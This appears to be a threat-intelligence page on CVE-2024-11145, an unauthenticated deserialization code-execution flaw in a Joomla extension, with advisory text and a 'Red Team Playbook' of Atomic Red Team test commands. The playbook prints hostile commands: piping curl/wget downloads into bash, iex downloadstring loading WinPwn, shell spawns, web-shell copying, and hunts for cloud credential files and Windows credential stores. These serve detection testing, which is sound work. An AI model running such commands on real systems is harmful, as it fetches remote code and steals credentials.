CVE-2024-11145
Overview
This vulnerability is a deserialization flaw in the Valor Apps Easy Folder Listing Pro Joomla! extension. It arises from insecure handling of serialized data inputs within the application's deserialization routines, allowing manipulation of object state during processing. The affected component is the Easy Folder Listing Pro plugin versions prior to 3.8 and 4.5, which improperly deserialize attacker-controlled data without validation or sanitization.
Vulnerability Description
Valor Apps Easy Folder Listing Pro has a deserialization vulnerability that allows an unauthenticated, remote attacker to execute arbitrary code with the privileges of the Joomla! application. Fixed in versions 3.8 and 4.5.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code with the same privileges as the Joomla! application, enabling full system compromise or data manipulation. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), making exploitation straightforward over the network. This can lead to unauthorized control over the web server hosting the vulnerable plugin, resulting in potential data breaches, service disruption, or lateral movement within the affected environment.
Solution
Users should upgrade Valor Apps Easy Folder Listing Pro to version 3.8 or 4.5 or later, as these versions contain fixes addressing the deserialization vulnerability. Detailed patch instructions and version information are available from the vendor's advisory at https://www.valorapps.com/web-products/easy-folder-listing-pro.html. Applying these updates promptly is the recommended remediation to eliminate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The deserialization vulnerability present in Valor Apps Easy Folder Listing Pro poses a significant risk to systems utilizing the Joomla! application framework. This flaw arises from improper handling of serialized data, allowing an attacker to manipulate the deserialization process. When an application deserializes untrusted data, it can lead to the execution of arbitrary code, which could be executed with the privileges of the Joomla! application. This vulnerability is particularly concerning as it does not require authentication, enabling remote attackers to exploit it without needing valid credentials. The affected versions, specifically 3.7, are susceptible to this flaw, while subsequent releases, 3.8 and 4.5, have implemented necessary fixes.
Attack vectors for this vulnerability are diverse and can be executed with relative ease. An attacker may craft a malicious payload that, when deserialized by the application, triggers the execution of arbitrary code. This can be achieved through various means, such as sending specially crafted HTTP requests or manipulating input fields that the application processes. Once the payload is successfully executed, the attacker gains control over the Joomla! application, potentially leading to further exploitation of the underlying server or network. Scenarios could range from data theft and unauthorized access to sensitive information, to deploying malware or ransomware, thus amplifying the threat landscape.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on Joomla! for their web presence. The potential for arbitrary code execution means that an attacker could gain full control over the web application, leading to data breaches, loss of customer trust, and significant financial repercussions. Businesses could face regulatory penalties if sensitive data is compromised, especially in sectors governed by strict data protection laws. Furthermore, the reputational damage associated with such breaches can have long-lasting effects, as customers may choose to disengage from a brand perceived as insecure.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. Regularly updating the Easy Folder Listing Pro extension to the latest versions is crucial, as these updates contain patches that address known vulnerabilities. Additionally, implementing web application firewalls (WAFs) can help filter out malicious requests before they reach the application. Monitoring logs for unusual activity, such as unexpected deserialization attempts or unauthorized access attempts, can also provide early warning signs of exploitation. Furthermore, conducting regular security assessments and penetration testing can help identify potential weaknesses in the application and its environment, allowing organizations to proactively address vulnerabilities before they can be exploited.
In conclusion, the deserialization vulnerability in Valor Apps Easy Folder Listing Pro represents a critical threat to Joomla! applications, with the potential for severe consequences if exploited. Organizations must prioritize the implementation of robust security measures, including timely updates, monitoring, and proactive security assessments, to safeguard their systems against such vulnerabilities. By adopting a comprehensive approach to cybersecurity, businesses can mitigate risks and protect their assets in an increasingly hostile digital landscape.
CSURFACE threat intelligence has detected a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-11145, rising by over 30% in recent assessments. This upward trend, coupled with a sustained week-over-week increase, indicates growing attacker interest and a higher likelihood of exploitation attempts targeting the Valor Apps Easy Folder Listing Pro vulnerability. Although no new exploit code or active campaigns have been observed by our sensors, the elevated EPSS score reflects an increased risk posture that defenders must acknowledge. This shift suggests that threat actors may be preparing or refining exploit techniques, potentially accelerating the timeline for active exploitation. Consequently, the threat level associated with this critical vulnerability has intensified, underscoring the urgency for vigilant monitoring and readiness within affected environments.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Valorapps | Easy Folder Listing Pro | All |
cpe:2.3:a:valorapps:easy_folder_listing_pro:*:*:*:*:*:joomla\!:*:*
|
|
|
Valorapps | Easy Folder Listing Pro | 3.7 |
cpe:2.3:a:valorapps:easy_folder_listing_pro:3.7:*:*:*:*:joomla\!:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
60%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-11145 |
| valorapps.com |
GitHub CVE
|
https://www.valorapps.com/web-products/easy-folder-listing-pro.html |
| github.com |
GitHub CVE
|
https://github.com/cisagov/CSAF/blob/develop/csaf_files/IT/white/2024/va-24-331-01.json |